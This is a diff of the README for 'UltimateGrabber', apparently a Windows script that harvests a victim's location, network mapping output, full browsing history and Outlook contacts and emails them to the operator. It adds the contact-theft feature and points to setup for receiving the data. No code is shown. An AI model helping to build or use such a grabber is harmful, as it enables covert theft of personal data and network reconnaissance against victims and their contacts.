MightySpaceman/UltimateGrabber/README.md

 - Rough lat/long
 - Output of windows `arp -a` command to map network.
 - Output of `ipconfig` windows command, to also map network.
-- **Finally, the script attaches a copy of the user's entire internet browsing history to the email as a .csv file.**
+- Attaches a copy of the user's entire internet browsing history to the email as a .csv file.
+- Attaches a .txt file containing all of the user's microsoft outlook contacts with their full name, email adress, phone number, job and departement.

 # Setup
 To get the script to work, you will have to insert a few details into the script so that it actually sends the email to you - otherwise it would just return an error message.